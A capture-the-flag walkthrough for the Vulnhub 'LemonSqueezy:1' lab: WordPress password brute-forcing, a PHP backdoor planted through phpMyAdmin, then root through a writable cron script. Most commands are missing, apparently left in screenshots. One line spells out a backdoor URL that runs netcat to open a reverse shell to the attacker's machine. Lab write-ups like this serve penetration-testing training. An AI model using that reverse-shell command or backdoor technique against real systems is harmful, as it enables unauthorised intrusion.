LemonSqueezy:1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called “LemonSqueezy:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to James Hay. Let’s start and learn how to successfully breach it.

Level: Easy to Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here

Penetration Testing Methodology

Reconnaissance

Nmap

Enumeration

  • Abusing HTTP Services
  • Web Directory Bruteforce (dirb)
  • Wpscan for Username and Password Enumeration

Exploitation

  • Logging to WordPress
  • Shell Uploading through PhpMyAdmin

Post Enumeration

  • Using LinEnum.sh
  • Creating Netcat Shell using msfvenom

 Privilege Escalation

  • Abusing cronjob for Writable Script
  • Capture the flag

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.105 as our host IP.

Then we used nmap for port enumeration. We found port 80 for http.

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 80 is open I look toward browser and explore target ip 192.168.1.105 . But it is not much of great help. Moving on.

Further, we use dirb for directory brute-forcing and found phpmyadmin & wordpress page with status code 200 OK on executing following command.

When we searched the above-listed page, i.e. wordpress we found nothing useful.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

I found two user names: orange and lemon.

Now the next job is to hunt for a password for user orange for which we will use rockyou.txt. Time to fire up wpscan with our username & password list to valid user login combination.

We have successfully found the password for orange. Let’s make good use of them.

 Now we mapped the domain name with the target machine’s IP address in the /etc/hosts file.

Further, we login to WordPress using orange credentials. It was holding another clue for us in edit post section we found a password i.e. [email protected]! .

Now our next job is to try to login phpmyadmin page with this password using user orange.

Exploitation

After logging in let’s explore the page further to find some juicy information.

Here we found the database named wordpress.

So, we have login into phpmyadmin, now it was time to exploit phpMyAdmin to get a reverse connection and we have already published a post on “Shell Uploading in Web Server through PhpMyAdmin”. With the help of this post, I try to exploit phpMyAdmin and follow the given steps.

Within the database of WordPress, we created a table as I have given raj and click on create.

Click on raj to construct an MYSQL query inside your database. Hence click on SQL tab where you can enter the SQL query code.

Now, the next part is interesting because here I am going to execute malicious code as SQL query which will create a Remote code Execution inside the webserver. In the following screenshot, you can see I have given above malicious php code as SQL query and then click on GO tab to execute it.

Now type the following URL to find whether we are successful or not in order to create RCE vulnerability.

When you execute the above URL in the browser you will get the information of victim ‘s PC.

Now it was time to get netcat reverse connection of the host machine by executing the following URL.

 http://192.168.1.105/wordpress/backdoor.php?cmd=nc  -e /bin/bash 192.168.1.112 1234

Now before executing the backdoor let’s fire up netcat listener in another terminal.

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.

here we found a text file name user.txt as 1st flag. Now let go for Privilege Escalation with the help of Linenum.sh which will help us in post enumeration.

cat user.txt

Post Enumeration

Next, we tried to download linenum.sh in /tmp but we were not able to do so because /tmp was not having the permission to do so. Since /var/www/html/wordpress is writable we will try to download there.

LinEnum.sh is bash script used for enumerating the Linux machine to checks which services are running on the machine, privileges access, version information, system information, user information etc.

  1. Download the script or get the location where this script is stored.
  2. Host the python server and copy the link of the LinEnum.sh file.
  3. Download the script in the remote host using “wget” command in the “/var/www/html/wordpress” directory.
  4. Change the permission of the LinEnum.sh shell script using “chmod” command.
  5. Now run the script in the remote machine.

So here got some information after running the shell script LinEnum.sh

As a result, we found that /etc/logrotate.d/logrotate is writable and also run as cronjob at every 2 minutes after.

Privilege Escalation

In order to compromise the machine and get the root access, we will use msfvenom for our further exploitation.

As we know logrotate is writable and run as a cronjob, therefore, I will overwrite this file with the following command.

On other hand we will fire up netcat listener in another terminal to get a reverse shell and wait for some 2 minutes as soon as the logrotate will execute as cronjob this will give us root privileges shell and finally capture the final flag.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here

Leave a Reply

Your email address will not be published. Required fields are marked *